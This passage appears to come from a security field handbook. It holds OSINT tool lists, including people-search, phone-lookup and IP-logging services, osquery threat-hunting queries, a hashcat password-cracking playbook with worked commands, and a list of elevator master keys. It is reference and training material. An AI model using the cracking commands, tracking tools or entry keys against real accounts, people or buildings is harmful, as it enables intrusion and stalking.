DomainIQ [Link]/reverse_analytics
Find Sub Domains [Link]
FOFA [Link]
Follow That Page [Link]
IntelX Google ID [Link]/tools?tab=analytics
MX Toolbox [Link]
Nerdy Data [Link]
Pentest Tools pentest-[Link]/reconnaissance/find-subdomains-of-domain
PubDB [Link]
PublicWWW Source Code [Link]
Records Finder [Link]/email
Shared Count [Link]
Shodan [Link]
Similar Web [Link]
Spy On Web [Link]
Spyse [Link]
Thingful (IoT) [Link]
Threat Crowd [Link]
Threat Intelligence Platform [Link]
URLscan [Link]
Virus Total [Link]
Visual Ping [Link]
Visual Site Mapper [Link]
Wigle [Link]

Zoom Eye [Link]
IP ADDRESS
Censys [Link]/ipv4
Exonerator [Link]
IPLocation [Link]
Shodan [Link]
Spyse [Link]
Threat Crowd [Link]
Threat Intelligence Platform [Link]
UltraTools [Link]
ViewDNS [Link]/reverseip
ViewDNS [Link]/portscan
ViewDNS [Link]/whois
ViewDNS [Link]/iplocation
Virus Total [Link]
IP LOG/SHORTENER
[Link] [Link]
Bitly [Link]
Canary Tokens [Link]
Check Short URL [Link]
Get Notify [Link]
Google URL Shortener [Link]
IP Logger [Link]
Tiny [Link]
URL Biggy [Link]
LIVE CAMERAS
Airport Webcams [Link]
EarthCam [Link]
Opentopia [Link]/[Link]
Open Webcam Network [Link]
Webcam Galore [Link]
WorldCam [Link]
METADATA
Exif Info [Link]
Extract Metadata [Link]
Forensically [Link]/photo-forensics
Get Metadata [Link]
Jeffrey's Exif Viewer [Link]/[Link]
Online Barcode Reader online-barcode-reader/[Link]
OPEN DIRECTORY SEARCH
Filer [Link]/gen2/[Link]
File Chef [Link]
File Pursuit [Link]
Mamont [Link]
Open Directory Search Tool [Link]
Open Directory Search Portal [Link]/od/

Musgle [Link]
Lumpy Soft [Link]
Lendx [Link]
PEOPLE
Family Tree Now [Link]/search
Fast People Search [Link]
Infobel [Link]
Intelius [Link]
Nuwber [Link]
Radaris [Link]
Records Finder [Link]
SearchPeopleFree [Link]
Spytox [Link]
That’s Them [Link]
True People Search [Link]
UFind [Link]
Xlek [Link]
SATELLITE
Bing Maps [Link]/maps
Descartes Labs [Link]
Dual Maps [Link]/dualmaps/[Link]m
Google Maps [Link]
Wikimapia [Link]
World Imagery Wayback [Link]/wayback
Yandex Maps [Link]/maps
Zoom Earth [Link]
SOCIAL MEDIA
Custom Google Search Engine [Link]?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:iyxger-cwug&q=%22%22
Many Contacts [Link]/en/mail-check
Records Finder [Link]
Social Searcher [Link]
Twitter Advanced [Link]/search-advanced
Who Posted What [Link]
Who Tweeted First [Link]/first
TELEPHONE
Carrier Lookup [Link]
Dehashed [Link]
Everyone API [Link]
Free Carriers Lookup [Link]
Nuwber [Link]
Old Phone Book [Link]
Open CNAM [Link]
People Search Now [Link]
Sly Dial [Link]
Spy Dialer [Link]
Spytox [Link]

That’s Them [Link]
True Caller [Link]
Twilio [Link]/lookup
TOR
Ahmia [Link]
Dark Search [Link]
Tor2Web [Link]
Not Evil (Inside TOR) [Link]
VEHICLE
Nomerogram - RU Plates [Link]
Vin-Info [Link]
World License Plates [Link]
USERNAME
KnowEm [Link]
Name Checkr [Link]
Name Vine [Link]
User Search [Link]

OSINT_Resources
OSINT GUIDES N/A

BELLINGCAT's ONLINE INVESTIGATION TOOLKIT
[Link]

Intel Techniques OSINT Packet
[Link]

Aware Online OSINT Tools
[Link]

OSINT Techniques Tools
[Link]

OSINTCurious 10 Minute Tips
[Link]

Investigative Dashboard
Global index of public registries for companies, land registries
and courts. Search millions of documents and datasets, from public
sources, leaks and investigations. Create visual investigative
scenarios that map the people and companies in your story.
[Link]

I-Intelligence OSINT Resources Handbook
[Link]
content/uploads/2018/06/OSINT_Handbook_June-2018_Final.pdf

Week in OSINT (Sector035)
[Link]

AWESOME-OSINT Github
[Link]

Ph055a's OSINT Collection
This is a maintained collection of free actionable resources for
those conducting OSINT investigations.
those conducting OSINT investigations.
[Link]

OSINT_SearchEngines
ALL DISCOVERY N/A

BAIDU SEARCH
REFERENCE:
[Link]
In English
[Link] Tips
[Link]

GOOGLE SEARCH
OPERATOR DESCRIPTION
Force an exact-match search. Use this to refine
“search term” results for ambiguous searches, or to exclude
synonyms when searching for single words.
Example: “steve jobs”
Search for X or Y. This will return results
OR related to X or Y, or both. Note: The pipe (|)
operator can also be used in place of “OR.”
Examples: jobs OR gates / jobs | gates
AND          Search for X and Y. This will return only results
             related to both X and Y. Note: It doesn't really
             make much difference for regular searches, as
             Google defaults to "AND" anyway. But it's very
             useful when paired with other operators.
             Example: jobs AND gates
-            Exclude a term or phrase. In our example, any
             pages returned will be related to jobs but
             not Apple (the company).
             Example: jobs -apple
*            Acts as a wildcard and will match any word or
             phrase.
             Example: steve * apple
( )          Group multiple terms or search operators to
             control how the search is executed.
             Example: (ipad OR iphone) apple
$            Search for prices. Also works for Euro (€), but
             not GBP (£).
             Example: ipad $329
define:      A dictionary built into Google, basically. This
             will display the meaning of a word in a card-like
             result in the SERPs.
             Example: define:entrepreneur
cache:       Returns the most recent cached version of a web
             page (providing the page is indexed, of course).
             Example: cache:[Link]
filetype:    Restrict results to those of a certain filetype,
             e.g. PDF, DOCX, TXT, PPT, etc. Note: The "ext:"
             operator can also be used; the results are
             identical.
             Example: apple filetype:pdf / apple ext:pdf
site:        Limit results to those from a specific website.
             Example: site:[Link]
related:     Find sites related to a given domain.
             Example: related:[Link]
intitle:     Find pages with a certain word (or words) in the
             title. In our example, any results containing the
             word "apple" in the title tag will be returned.
             Example: intitle:apple
allintitle:  Similar to "intitle," but only results containing
             all of the specified words in the title tag will
             be returned.
             Example: allintitle:apple iphone
inurl:       Find pages with a certain word (or words) in the
             URL. For this example, any results containing the
             word "apple" in the URL will be returned.
             Example: inurl:apple
allinurl:    Similar to "inurl," but only results containing
             all of the specified words in the URL will be
             returned.
             Example: allinurl:apple iphone
intext:      Find pages containing a certain word (or words)
             somewhere in the content. For this example, any
             results containing the word "apple" in the page
             content will be returned.
             Example: intext:apple
allintext:   Similar to "intext," but only results containing
             all of the specified words somewhere on the page
             will be returned.
             Example: allintext:apple iphone
AROUND(X)    Proximity search. Find pages containing two words
             or phrases within X words of each other. For this
             example, the words "apple" and "iphone" must be
             present in the content and no further than four
             words apart.
             Example: apple AROUND(4) iphone
weather:     Find the weather for a specific location. This is
             displayed in a weather snippet, but it also
             returns results from other "weather" websites.
             Example: weather:san francisco
stocks:      See stock information (i.e., price, etc.) for a
             specific ticker.
             Example: stocks:aapl
map:         Force Google to show map results for a locational
             search.
             Example: map:silicon valley
movie:       Find information about a specific movie. Also
             finds movie showtimes if the movie is currently
             showing near you.
             Example: movie:steve jobs
in           Convert one unit to another. Works with
             currencies, weights, temperatures, etc.
             Example: $329 in GBP
source:      Find news results from a certain source in Google
             News.
             Example: apple source:the_verge
_            Not exactly a search operator, but acts as a
             wildcard for Google Autocomplete.
             Example: apple CEO _ jobs
#..#         Search for a range of numbers. In the example
             below, searches related to "WWDC videos" are
             returned for the years 2010–2014, but not for
             2015 and beyond.
             Example: wwdc video 2010..2014
inanchor:    Find pages that are being linked to with specific
             anchor text. For this example, any results with
             inbound links containing either "apple" or
             "iphone" in the anchor text will be returned.
             Example: inanchor:apple iphone
allinanchor: Similar to "inanchor," but only results
             containing all of the specified words in the
             inbound anchor text will be returned.
             Example: allinanchor:apple iphone
loc:         Find results from a given area (loc:placename).
             Example: loc:"san francisco" apple
location:    Find news from a certain location in Google News.
             Example: loc:"san francisco" apple

REFERENCE:
[Link]CheatSheet/tree/master/Google
[Link]
[Link]
YANDEX
Most of the standard Boolean operators listed above for Google also
work in Yandex.

REFERENCE:
[Link]

OSINT_SocialMedia
OSINT RECON ALL

NAME | DESCRIPTION | LINK

FACEBOOK
[Link]/beta | Automatically advanced searches for Facebook profiles. | [Link]/beta
Who posted what? | Find posts on Facebook. | [Link]
IntelTechniques | Various tools for analyzing Facebook profiles/pages. | [Link]/[Link]ml
Facebook Intersect Search Tool | Conduct Facebook intersect searches across multiple variables. | [Link]/facebook-intersect-search-tool
Facebook Live Map | Live broadcasts around the world. | [Link]/livemap
[Link] | Download public Facebook videos. | [Link]
peoplefindThor | Graph searches. | [Link]
Search Is Back! | Graph searches. | [Link]
Search Tool | Find accounts by name, email, screen name, and phone. | [Link]/[Link]ml
StalkScan | Automatic advanced searches for your | [Link]
Video Downloader Online | Download Facebook videos. | [Link]
Skopenow | Social Media Investigations - name, phone, email, username searches. | [Link]

INSTAGRAM
Gramfly | View interactions and activity of Instagram users. | [Link]
StoriesIG | Tool for downloading Instagram stories. | [Link]
Save Instagram Stories | Allows you to do a username search for stories already saved. | [Link]/save-instagram-[Link]

LINKEDIN
Socilab | Visualize and analyze your own LinkedIn network. | [Link]
LinkedIn Overlay Remover | Removes the overlay that displays over a LinkedIn profile. | [Link]/nl/firefox/addon/linkedin-overlay-remover/

REDDIT
F5Bot | Sends you an email when a keyword is mentioned on Reddit. | [Link]/blog/f5bot/

SNAPCHAT
Snap Map | Searchable map of geotagged snaps. | [Link]

TUMBLR
Tumblr Originals | Find original posts per Tumblr, thus excluding reblogs. | [Link]/fun/tumblr_originals

TIKTOK
TikTok Kapi | Search TikTok by hashtag. | [Link]

TWITTER
botcheck | Check Twitter bots. | [Link]
Botometer | Check Twitter bots. | [Link]
InVID verification plugin | InVID plugin Twitter advanced search by time interval. | [Link]/verify
Onemilliontweetmap | Tweets map per locations up to 6 hours old, keyword search option. | [Link]
Treeverse | Chrome ext to visualize Twitter conversations. | [Link]/hGvska63Li
Tweetreach | Find reach of tweets. | [Link]
TwitterAudit | Check Twitter bots. | [Link]
Twittervideodownloader | Download posted Twitter videos. | [Link]
Twitter advanced search | Search Twitter by date, keywords, etc. | [Link]/search-advanced
Twitter geobased search | Twitter geocoord search. | [Link]/twitter/
twint | Python Twitter scraping tool for followers, following, Tweets, while evading most API limits. | [Link]/twintproject/twint
Twlets | Download tweets, followers & likes. | [Link]
quarter tweets | Geobased Twitter search. | [Link]/twitter
t | CLI tool for Twitter. | [Link]/sferik/t

YOUTUBE
Amnesty YouTube Dataviewer | Reverse image search & exact uploading time. | [Link]/sites/default/custom-scripts/citizenevidence
Geo Search Tool | Search YouTube on location. | [Link]/geo-search-tool/[Link]
YouTube Geofind | Search YouTube on location, topic, channel. | [Link]/youtube-geofind/location
youtube-dl | Python tool to download from a variety of sources. | [Link]/youtube-dl/

REFERENCE:
[Link]GguA/edit#heading=h.dgrpsgxju1wa

OSQUERY
BLUE TEAM THREAT HUNT WINDOWS/LINUX/MacOS
osquery is a tool that exposes an operating system as a
high-performance relational database. It enables developers to write
SQL-based queries that explore operating system data.

Query for top 10 largest processes by resident memory size
select pid, name, uid, resident_size from processes order by
resident_size desc limit 10;

Return process count, name for the top 10 most active processes
select count(pid) as total, name from processes group by name order
by total desc limit 10;

Finding new processes listening on network ports
select distinct [Link], [Link], [Link],
[Link] from processes as process join listening_ports as
listening on [Link] = [Link];

Finding suspicious outbound network activity
select [Link], [Link], local_address, remote_address, family,
protocol, local_port, remote_port from process_open_sockets s join
processes p on [Link] = [Link] where remote_port not in (80, 443) and
family = 2;

Finding processes that are running whose binary has been deleted
from the disk
select name, path, pid from processes where on_disk = 0;

Finding specific indicators of compromise (IOCs) in memory or on
disk
select * from file where path = '/dev/ptmx0';

select * from apps where bundle_identifier = '[Link]' or
bundle_identifier like '[Link].%' or bundle_package_type
like 'OSAX';

select * from launchd where label = '[Link]' or label like
'[Link].%' or name = '[Link]' or
name = '[Link]' or name =
'[Link]';

Finding new kernel modules that have loaded
#Run query periodically, diffing against older results
select name from kernel_modules;
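Both the "new processes listening" query and the kernel_modules query above only pay off when they are run on a schedule and compared with the previous run. The following Python script is an added example, not code from the handbook or from the osquery project: it diffs two osquery JSON result sets on the key columns you choose, so the same helper reports new listeners and newly loaded modules. The sample rows are constructed to stand in for what `osqueryi --json` prints on two consecutive runs.

```python
#!/usr/bin/env python3
"""Diff two osquery result snapshots to surface rows that appeared or vanished.

osqueryi prints results as a JSON array of objects when run as
  osqueryi --json "select name from kernel_modules;"
This helper compares an older snapshot with a newer one on the key columns
you choose, which is what "run periodically, diffing against older results"
amounts to. All sample rows below are constructed for the demo.
"""
import json

# Constructed: two scheduled runs of `select name from kernel_modules;`
# (the module names are placeholders, not real findings).
OLD_KERNEL_MODULES = json.dumps([
    {"name": "ext4"}, {"name": "xfs"}, {"name": "nf_conntrack"},
])
NEW_KERNEL_MODULES = json.dumps([
    {"name": "ext4"}, {"name": "nf_conntrack"}, {"name": "unknown_mod"},
])

# Constructed: two runs of the listening_ports join, reduced to a few columns.
OLD_LISTENING = json.dumps([
    {"pid": "812", "name": "sshd", "port": "22"},
])
NEW_LISTENING = json.dumps([
    {"pid": "812", "name": "sshd", "port": "22"},
    {"pid": "4242", "name": "unexpected_svc", "port": "4444"},
])


def load_snapshot(text):
    """Parse osquery --json output into a list of row dicts."""
    rows = json.loads(text)
    if not isinstance(rows, list):
        raise ValueError("expected a JSON array of result rows")
    return rows


def diff_snapshots(old_rows, new_rows, key_fields=("name",)):
    """Return (added, removed) rows, comparing rows on the given key columns.

    Keys are tuples of the chosen column values; keying a listener on
    (name, port) rather than pid keeps restarts of the same daemon quiet
    while a new name/port pair still shows up.
    """
    def key(row):
        return tuple(str(row.get(field, "")) for field in key_fields)

    old_by_key = {key(r): r for r in old_rows}
    new_by_key = {key(r): r for r in new_rows}
    added = [new_by_key[k] for k in sorted(new_by_key.keys() - old_by_key.keys())]
    removed = [old_by_key[k] for k in sorted(old_by_key.keys() - new_by_key.keys())]
    return added, removed


def report(added, removed, label):
    """Render the diff as one line per change, suitable for a hunt log."""
    lines = [f"NEW {label}: {row}" for row in added]
    lines += [f"GONE {label}: {row}" for row in removed]
    return lines


if __name__ == "__main__":
    added, removed = diff_snapshots(load_snapshot(OLD_KERNEL_MODULES),
                                    load_snapshot(NEW_KERNEL_MODULES))
    for line in report(added, removed, "kernel module"):
        print(line)
    added, removed = diff_snapshots(load_snapshot(OLD_LISTENING),
                                    load_snapshot(NEW_LISTENING),
                                    key_fields=("name", "port"))
    for line in report(added, removed, "listener"):
        print(line)
```

In practice you would persist each run's JSON to disk (or a scheduled-query log shipped by osqueryd) and feed the previous and current files to `load_snapshot`; the "GONE" rows matter too, since a module or listener disappearing between runs is as much a change as one appearing.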

Detect processes masquerading as legitimate Windows process
SELECT * FROM processes WHERE LOWER(name)='[Link]' AND
LOWER(path)!='c:\\windows\\system32\\[Link]' AND path!='';

SELECT name FROM processes WHERE pid=(SELECT parent FROM processes
WHERE LOWER(name)='[Link]') AND LOWER(name)!='[Link]';

SELECT * FROM processes WHERE LOWER(name)='[Link]' AND
LOWER(path)!='c:\\windows\\system32\\[Link]' AND
LOWER(path)!='c:\\windows\\syswow64\\[Link]' AND path!='';

SELECT name FROM processes WHERE pid=(SELECT parent FROM processes
WHERE LOWER(name)='[Link]') AND LOWER(name)!='[Link]';

Checks the hashes of accessibility tools to ensure they don't match
the hashes of [Link], [Link], or [Link]
SELECT * FROM hash WHERE (path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]') AND sha256 IN
(SELECT sha256 FROM hash WHERE
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\WindowsPowerShell\\v1.0\\[Link]e'
OR path='c:\\windows\\system32\\[Link]') AND
sha256!='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855';

Timestamp Inconsistency
select path,fn_btime,btime from ntfs_file_data where
device="\\.\PhysicalDrive0" and partition=3 and
directory="/Users/<USER>/Desktop/dir" and fn_btime != btime;

-- Parentheses are required here: AND binds tighter than OR, so without
-- them the "btime > ctime" branch ignores the device/partition/path filter.
select filename, path from ntfs_file_data where
device="\\.\PhysicalDrive0" and partition=2 and
path="/Users/<USER>/Downloads" and (fn_btime > ctime OR btime >
ctime);

Directory Unused Filename Entries
select parent_path,filename,slack from ntfs_indx_data WHERE
parent_path="/Users/<USER>/Desktop/test_dir" and slack!=0;

REFERENCE:
[Link]
[Link]
[Link]detection-dfir/
[Link]
[Link]
[Link]
[Link]

PACKAGE MANAGERS
ALL ADMINISTRATION LINUX

                         apt (deb)                  zypp (rpm)
                         Debian, Ubuntu, Mint       openSUSE
MANAGING SOFTWARE
Install new package
  from repository        apt-get install pkg        zypper install pkg
Install new software
  from package file      dpkg -i pkg                zypper install pkg
Update existing
  software               apt-get install pkg        zypper update -t package pkg
Remove unwanted
  software               apt-get remove pkg         zypper remove pkg
UPDATING
Update package list      apt-get update /           zypper refresh
                         aptitude update
Update system            apt-get upgrade            zypper update
SEARCHING
Search by package name   apt-cache search pkg       zypper search pkg
Search by pattern        apt-cache search pattern   zypper search -t pattern pattern
Search by file name      apt-file search path       zypper wp file
List installed packages  dpkg -l                    zypper search -is
CONFIGURING
List repositories        cat /etc/apt/[Link]        zypper repos
Add repository           vi /etc/apt/[Link]         zypper addrepo path name
Remove repository        vi /etc/apt/[Link]         zypper removerepo name

                         yum (rpm)                  urpmi (rpm)
                         Fedora                     Mandriva
MANAGING SOFTWARE
Install new package
  from repository        yum install pkg            urpmi pkg
Install new software
  from package file      yum localinstall pkg       urpmi pkg
Update existing
  software               yum update pkg             urpmi pkg
Remove unwanted
  software               yum erase pkg              urpme pkg
UPDATING
Update package list      yum check-update           [Link] -a
Update system            yum update                 urpmi --auto-select
SEARCHING
Search by package name   yum list pkg               urpmq pkg
Search by pattern        yum search pattern         urpmq --fuzzy pkg
Search by file name      yum provides file          urpmf file
List installed packages  rpm -qa                    rpm -qa
CONFIGURING
List repositories        yum repolist               urpmq --list-media
Add repository           vi /etc/[Link].d/          [Link] name path
Remove repository        vi /etc/[Link].d/          [Link] media

REFERENCE:
[Link]management/[Link]

PASSWORD CRACKING_Methodology
RED TEAM PASSWORD CRACKING ALL

REQUIRED SOFTWARE
You will want to install the following software on your Windows or
*NIX host. This book does not cover how to install said software
and assumes you were able to follow the included links and
extensive support websites.

HASHCAT v5.1 (or newer)
[Link]

JOHN THE RIPPER (v1.8.0 JUMBO)
[Link]

PACK v0.0.4 (Password Analysis & Cracking Toolkit)
[Link]

Hashcat-utils v1.9
[Link]

Additionally, you will need dictionaries and wordlists. The following
sources are recommended:

WEAKPASS DICTIONARY
[Link]

COMMAND STRUCTURE LEGEND
hashcat = Generic representation of the various Hashcat binary
names
john = Generic representation of the John the Ripper binary names
#type = Hash type; which is an abbreviation in John or a number in
Hashcat
[Link] = File containing target hashes to be cracked
[Link] = File containing dictionary/wordlist
[Link] = File containing permutation rules to alter [Link]
input
[Link] = File containing cracked password results
[Link] = File containing results of some functions output

Lastly, as a good reference for testing various hash types to place
into your "[Link]" file, the below sites contain all the various
hashing algorithms and example output tailored for each cracking
tool:

HASHCAT HASH FORMAT EXAMPLES
[Link]

JOHN THE RIPPER HASH FORMAT EXAMPLES
[Link]
[Link]

CORE HASH CRACKING KNOWLEDGE

ENCODING vs HASHING vs ENCRYPTING
Encoding = transforms data into a publicly known scheme for
usability
Hashing = one-way cryptographic function nearly impossible to
reverse
Encrypting = mapping of input data and output data reversible with
a key

CPU vs GPU
CPU = 2-72 cores mainly optimized for sequential serial processing
GPU = 1000's of cores with 1000's of threads for parallel
processing

CRACKING TIME = KEYSPACE / HASHRATE
Keyspace: charset^length (?a?a?a?a = 95^4 = 81,450,625)
Hashrate: hashing function / hardware power (bcrypt / GTX1080 =
13094 H/s)
Cracking Time: 81,450,625 / 13094 H/s = 6,220 seconds
*Keyspace displayed and Hashrate vary by tool and hardware
used

SALT = random data that's used as additional input to a one-way
function
ITERATIONS = the number of times an algorithm is run over a given
hash

HASH IDENTIFICATION: there isn't a foolproof method for identifying
which hash function was used by simply looking at the hash, but
there are reliable clues (i.e. $6$ sha512crypt). The best method is
to know from where the hash was extracted and identify the hash
function for that software.

DICTIONARY/WORDLIST ATTACK = straight attack uses a precompiled
list of words, phrases, and common/unique strings to attempt to
match a password.

BRUTE-FORCE ATTACK = attempts every possible combination of a given
character set, usually up to a certain length.

RULE ATTACK = generates permutations against a given wordlist by
modifying, trimming, extending, expanding, combining, or skipping
words.

MASK ATTACK = a form of targeted brute-force attack by using
placeholders for characters in certain positions
(i.e. ?a?a?a?l?d?d).

HYBRID ATTACK = combines a Dictionary and Mask Attack by taking
input from the dictionary and adding mask placeholders (i.e.
[Link] ?d?d?d).
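The CRACKING TIME = KEYSPACE / HASHRATE rule above, together with the MASK and HYBRID attack definitions, is a short calculation that is worth automating when sizing an attack plan or judging a password policy against a rig's benchmark. The following Python script is an added example, not code from the handbook or from hashcat: it computes a mask's keyspace from hashcat's built-in charset sizes (?l ?u ?d ?s ?a ?b), extends the rule to a hybrid attack (wordlist size times mask keyspace), and converts keyspace / hashrate into a worst-case time. The 13094 H/s figure is the page's bcrypt/GTX1080 example; the mask strings passed in `main` are assumed inputs.

```python
#!/usr/bin/env python3
"""Keyspace and worst-case cracking time for hashcat-style masks.

Implements the page's rule CRACKING TIME = KEYSPACE / HASHRATE for any mask,
and the hybrid-attack generalisation keyspace = wordlist_size * mask_keyspace.
"""

# Sizes of hashcat's built-in charsets (the placeholders used in masks).
CHARSET_SIZES = {
    "l": 26,   # a-z
    "u": 26,   # A-Z
    "d": 10,   # 0-9
    "s": 33,   # printable specials, space included
    "a": 95,   # ?l?u?d?s
    "b": 256,  # 0x00-0xff
}


def mask_keyspace(mask):
    """Number of candidates a mask expands to: the product of each position's
    charset size (a literal character or '??' counts as one choice)."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            code = mask[i + 1]
            if code == "?":                 # '??' is a literal question mark
                size = 1
            elif code in CHARSET_SIZES:
                size = CHARSET_SIZES[code]
            else:
                raise ValueError(f"unknown placeholder ?{code}")
            i += 2
        else:                               # literal character
            size = 1
            i += 1
        total *= size
    return total


def hybrid_keyspace(wordlist_size, mask):
    """Hybrid attack (-a 6 / -a 7): every wordlist entry times every mask
    expansion, so the keyspace is the product of the two."""
    return wordlist_size * mask_keyspace(mask)


def cracking_time_seconds(keyspace, hashrate):
    """Worst-case seconds to exhaust a keyspace at hashrate hashes/second."""
    if hashrate <= 0:
        raise ValueError("hashrate must be positive")
    return keyspace / hashrate


def human_time(seconds):
    """Format a duration as d/h/m/s for quick comparison against a time budget."""
    seconds = int(seconds)
    days, rem = divmod(seconds, 86400)
    hours, rem = divmod(rem, 3600)
    minutes, secs = divmod(rem, 60)
    parts = []
    if days:
        parts.append(f"{days}d")
    if days or hours:
        parts.append(f"{hours}h")
    if days or hours or minutes:
        parts.append(f"{minutes}m")
    parts.append(f"{secs}s")
    return " ".join(parts)


def main():
    bcrypt_gtx1080 = 13094  # H/s, the page's example benchmark
    for mask in ("?a?a?a?a", "?a?a?a?l?d?d", "?a?a?a?a?a?a?a?a"):
        ks = mask_keyspace(mask)
        print(f"{mask:20} keyspace={ks:>22,} "
              f"time@{bcrypt_gtx1080} H/s={human_time(cracking_time_seconds(ks, bcrypt_gtx1080))}")
    # Assumed wordlist of 10,000 entries with the page's hybrid mask ?d?d?d.
    ks = hybrid_keyspace(10_000, "?d?d?d")
    print(f"hybrid 10,000 x ?d?d?d keyspace={ks:,}")


if __name__ == "__main__":
    main()
```

Feed the hashrate from your own `hashcat -b` run rather than a published number, as the EXPECTED RESULTS paragraph below advises; the 95^8 line in `main` makes the page's "above 8 characters is usually pointless" remark concrete for a slow hash.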

CRACKING RIG = from a basic laptop to a 64 GPU cluster, this is the
hardware/platform on which you perform your password hash attacks.

EXPECTED RESULTS
Know your cracking rig’s capabilities by performing benchmark
testing. Do not assume you can achieve the same results posted by
forum members without using the exact same dictionary, attack plan,
or hardware setup. Cracking success largely depends on your ability
to use resources efficiently and make calculated trade-offs based
on the target hash.

DICTIONARY/WORDLIST vs BRUTE-FORCE vs ANALYSIS
Dictionaries and brute-force are not the end all be all to crack
hashes. They are merely the beginning and end of an attack plan.
True mastery is everything in the middle, where analysis of
passwords, patterns, behaviors, and policies affords the ability to
recover that last 20%. Experiment with your attacks and research
and compile targeted wordlists with your new knowledge. Do not rely
heavily on dictionaries because they can only help you with what is
“known” and not the unknown.

CRACKING METHODOLOGY
The following is basic cracking methodology broken into steps, but
the process is subject to change based on current/future target
information uncovered during the cracking process.

1-EXTRACT HASHES
Pull hashes from target, identify hashing function, and properly
format output for your tool of choice.

2-FORMAT HASHES
Format your hashes based on your tool's preferred method. See tool
documentation for this guidance. Hashcat, for example, on each line
takes <user>:<hash> OR just the plain <hash>.

3-EVALUATE HASH STRENGTH
Using the Appendix table "Hash Cracking Speed (Slow-Fast)" assess
your target hash and its cracking speed. If it is a slow hash, you
will need to be more selective at what types of dictionaries and
attacks you perform. If it is a fast hash, you can be more liberal
with your attack strategy.

4-CALCULATE CRACKING RIG CAPABILITIES
With the information from evaluating the hash strength, baseline
your cracking rig's capabilities. Perform benchmark testing using
John The Ripper and/or Hashcat's built-in benchmark ability on your
rig.

john --test
hashcat -b

Based on these results you will be able to better assess your
attack options by knowing your rig's capabilities against a specific
hash. This will be a more accurate result of a hash's cracking
speed based on your rig. It will be useful to save these results
for future reference.

5-FORMULATE PLAN
Based on known or unknown knowledge begin creating an attack plan.
Included on the next page is a “Basic Cracking Playbook” to get you
started.

6-ANALYZE PASSWORDS
After successfully cracking a sufficient amount of hashes analyze
the results for any clues or patterns. This analysis may aid in
your success on any remaining hashes.

7-CUSTOM ATTACKS
Based on your password analysis create custom attacks leveraging
those known clues or patterns. Examples would be custom mask
attacks or rules to fit target users’ behavior or preferences.

8-ADVANCED ATTACKS
Experiment with Princeprocessor, custom Markov-chains,
maskprocessor, or custom dictionary attacks to shake out those
remaining stubborn hashes. This is where your expertise and
creativity really come into play.

9-REPEAT
Go back to STEP 4 and continue the process over again, tweaking
dictionaries, mask, parameters, and methods. You are in the grind
at this point and need to rely on skill and luck.

BASIC CRACKING PLAYBOOK
This is only meant as a basic guide to processing hashes and each
scenario will obviously be unique based on external circumstances.
For this attack plan assume the password hashes are raw MD5 and
some plain text user passwords were captured. If plain text
passwords were not captured, we would most likely skip to
DICTIONARY/WORDLIST attacks. Lastly, since MD5 is a "Fast" hash we
can be more liberal with our attack plan.

1-CUSTOM WORDLIST
First compile your known plain text passwords into a custom
wordlist file. Pass this to your tool of choice as a straight
dictionary attack.
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt

2-CUSTOM WORDLIST + RULES
Run your custom wordlist with permutation rules to crack slight
variations.
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --loopback

3-DICTIONARY/WORDLIST
Perform a broad dictionary attack, looking for common passwords and
leaked passwords in well-known dictionaries/wordlists.
hashcat -a 0 -m 0 -w 4 [Link] [Link]

4-DICTIONARY/WORDLIST + RULES
Add rule permutations to the broad dictionary attack, looking for
subtle changes to common words/phrases and leaked passwords.
hashcat -a 0 -m 0 -w 4 [Link] [Link] -r [Link] --loopback

5-CUSTOM WORDLIST + RULES
Add any newly discovered passwords to your custom wordlist and run
an attack again with permutation rules, looking for any other
subtle variations.
awk -F ":" '{print $2}' [Link] >> custom_list.txt
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --loopback

6-MASK
Now we will use mask attacks included with Hashcat to search the
keyspace for common password lengths and patterns, based on the
RockYou dataset.
hashcat -a 3 -m 0 -w 4 [Link] [Link]

7-HYBRID DICTIONARY + MASK
Using a dictionary of your choice, conduct hybrid attacks looking
for larger variations of common words or known passwords by
appending/prepending masks to those candidates.
hashcat -a 6 -m 0 -w 4 [Link] [Link] [Link]
hashcat -a 7 -m 0 -w 4 [Link] [Link] [Link]

8-CUSTOM WORDLIST + RULES
Add any newly discovered passwords back to your custom wordlist and
run an attack again with permutation rules, looking for any other
subtle variations.
awk -F ":" '{print $2}' [Link] >> custom_list.txt
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --loopback

9-COMBO
Using a dictionary of your choice, perform a combo attack by
individually combining the dictionary's password candidates
together to form new candidates.
hashcat -a 1 -m 0 -w 4 [Link] [Link] [Link]

10-CUSTOM HYBRID ATTACK
Add any newly discovered passwords back to your custom wordlist and
perform a hybrid attack against those newly acquired passwords.
awk -F ":" '{print $2}' [Link] >> custom_list.txt
hashcat -a 6 -m 0 -w 4 [Link] custom_list.txt [Link]
hashcat -a 7 -m 0 -w 4 [Link] [Link] custom_list.txt

11-CUSTOM MASK ATTACK
By now the easier, weaker passwords may have fallen to cracking,
but still some remain. Using PACK (on pg.51) create custom mask
attacks based on your currently cracked passwords. Be sure to sort
out masks that match the previous [Link] list.
hashcat -a 3 -m 0 -w 4 [Link] custom_masks.hcmask

12-BRUTE-FORCE
When all else fails begin a standard brute-force attack, being
selective as to how large a keyspace your rig can adequately
brute-force. Above 8 characters is usually pointless due to
hardware limitations and password entropy/complexity.
hashcat -a 3 -m 0 -w 4 [Link] -i ?a?a?a?a?a?a?a?a

PHYSICAL ENTRY_Keys
RED TEAM PHYSICAL N/A
Common master keys for physical security locks.

ELEVATOR MASTER KEYS
KEY         ELEVATOR        DESCRIPTION
FEO-K1      Universal       This is the most common and universal key for
                            Fire Service
EPCO1/EN1   Universal       Common Fire Service key, sometimes used on
                            Schindler elevators
Yale 3502   New York        Fire Service master key for every elevator in
                            New York
Yale 2642   New York        Old Fire Service master key for every elevator
                            in New York
BGM30       OTIS            Opens the panels for OTIS elevators
UTF         OTIS            Fire Service master key for OTIS elevators
UTA         OTIS            Independent Service, fan, light, cabinet for
